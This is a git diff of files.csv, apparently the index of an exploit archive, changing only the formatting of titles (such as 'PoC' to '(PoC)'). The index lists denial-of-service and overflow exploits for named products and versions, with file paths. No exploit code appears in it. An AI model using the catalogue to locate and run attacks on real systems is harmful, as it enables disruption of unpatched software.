diff --git a/files.csv b/files.csv
index 87c68808a..81dc588c0 100644
--- a/files.csv
+++ b/files.csv
@@ -1,6 +1,6 @@
 id,file,description,date,author,platform,type,port
 9,platforms/windows/dos/9.c,"Apache 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
-37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC (1)",2015-05-19,Garage4Hackers,windows,dos,0
+37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash (PoC) (1)",2015-05-19,Garage4Hackers,windows,dos,0
 11,platforms/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",linux,dos,0
 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",windows,dos,0
 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0
@@ -10,13 +10,13 @@ id,file,description,date,author,platform,type,port
 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos,0
 61,platforms/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0
 62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service",2003-07-22,zerash,hardware,dos,0
-65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
+65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Remote Denial of Service (MS03-031)",2003-07-25,refdom,windows,dos,0
 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0
 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0
 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",windows,dos,0
 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,multiple,dos,80
 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
-113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
+113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi 
Auriemma",windows,dos,0
@@ -254,7 +254,7 @@ id,file,description,date,author,platform,type,port
 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0
 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0
 1339,platforms/windows/dos/1339.c,"freeFTPd 1.0.10 - 'PORT' Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos,0
-1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0
+1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)",2005-11-27,darkeagle,windows,dos,0
 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - create() Denial of Service",2005-11-29,rgod,php,dos,0
 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
@@ -283,7 +283,7 @@ id,file,description,date,author,platform,type,port
 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0
 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0
 1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
-1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
+1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0
 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0
@@ -376,11 +376,11 @@ id,file,description,date,author,platform,type,port
 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0
 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0
 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0
-2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)",2006-08-16,Preddy,windows,dos,0
+2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,windows,dos,0
 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0
-2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0
+2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,windows,dos,0
 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash",2006-08-18,Mr.Niega,windows,dos,0
-2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0
+2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos,0
 2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0
 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0
 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0
@@ -407,7 +407,7 @@ id,file,description,date,author,platform,type,port
 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0
 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0
 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0
-2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0
+2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0
 2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0
 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
@@ -425,7 +425,7 @@ id,file,description,date,author,platform,type,port
 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0
 2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - (ACE) Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0
 2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - (CHM) Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0
-2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
+2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
 2901,platforms/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0
 2910,platforms/multiple/dos/2910.txt,"Sophos AntiVirus - '.CHM' File Heap Overflow (PoC)",2006-12-10,"Damian Put",multiple,dos,0
 2911,platforms/multiple/dos/2911.txt,"Sophos AntiVirus - '.CHM' Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",multiple,dos,0
@@ -484,7 +484,7 @@ id,file,description,date,author,platform,type,port
 3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0
 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0
 3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
-3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
+3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos,0
 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0
 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0
@@ -636,7 +636,7 @@ id,file,description,date,author,platform,type,port
 4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
 4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0
 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0
-4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0
+4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs)",2007-09-08,ZhenHan.Liu,windows,dos,0
 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0
 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0
 4409,platforms/windows/dos/4409.html,"HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0
@@ -712,7 +712,7 @@ id,file,description,date,author,platform,type,port
 5306,platforms/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0
 5307,platforms/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0
 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0
-5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service",2008-03-30,Marsu,windows,dos,0
+5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos,0
 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .doc File Denial of Service",2008-03-31,"Iron Team",windows,dos,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
@@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
-5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
+5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0
 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
@@ -808,7 +808,7 @@ id,file,description,date,author,platform,type,port
 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0
 6615,platforms/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
 6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - '.zip' Denial of Service",2008-09-28,"fl0 fl0w",windows,dos,0
-6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0
+6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - (PoC) (MS08-052)",2008-09-28,"John Smith",windows,dos,0
 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
 6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0
 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
@@ -821,13 +821,13 @@ id,file,description,date,author,platform,type,port
 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0
 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0
-6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
+6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
 6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0
 6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0
 6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser - (array sort) Silent Crash",2008-10-10,ikki,hardware,dos,0
-6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
-6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service",2008-10-12,dmnt,windows,dos,0
+6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
+6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,windows,dos,0
 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos,0
 6742,platforms/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial 
of Service",2008-10-13,dmnt,windows,dos,0
 6752,platforms/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,windows,dos,0
@@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port
 7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0
 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
-7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
+7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0
 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
@@ -947,7 +947,7 @@ id,file,description,date,author,platform,type,port
 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0
 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0
 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
-8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
+8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",windows,dos,0
 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0
 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0
 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0
@@ -956,7 +956,7 @@ id,file,description,date,author,platform,type,port
 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (Multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0
 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,windows,dos,0
 8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service",2009-03-05,SecurityReason,bsd,dos,0
-8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0
+8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0
 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0
 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0
@@ -965,7 +965,7 @@ id,file,description,date,author,platform,type,port
 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0
 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0
 8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)",2009-03-16,Encrypt3d.M!nd,windows,dos,0
-8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0
+8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)",2009-03-18,zAx,windows,dos,0
 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0
 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0
@@ -975,7 +975,7 @@ id,file,description,date,author,platform,type,port
 8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0
 8265,platforms/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0
 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0
-8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0
+8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)",2009-03-25,"Guido Landi",multiple,dos,0
 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0
 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,Encrypt3d.M!nd,windows,dos,0
 8306,platforms/windows/dos/8306.txt,"Mozilla Firefox 3.0.x - (XML Parser) Memory Corruption / Denial of Service (PoC)",2009-03-30,"Wojciech Pawlikowski",windows,dos,0
@@ -991,7 +991,7 @@ id,file,description,date,author,platform,type,port
 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0
 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0
 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0
-8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0
+8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)",2009-04-06,DATA_SNIPER,windows,dos,0
 8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - '.ui' Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,windows,dos,0
 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos,0
 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",windows,dos,0
@@ -1017,7 +1017,7 @@ id,file,description,date,author,platform,type,port
 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0
 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0
 8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0
-8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
+8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8484,platforms/windows/dos/8484.pl,"1by1 1.67 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0
 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0
 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0
@@ -1052,7 +1052,7 @@ id,file,description,date,author,platform,type,port
 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0
 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
 8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service (PoC)",2009-05-13,mu-b,multiple,dos,0
-8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0
+8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs)",2009-05-14,SirGod,windows,dos,0
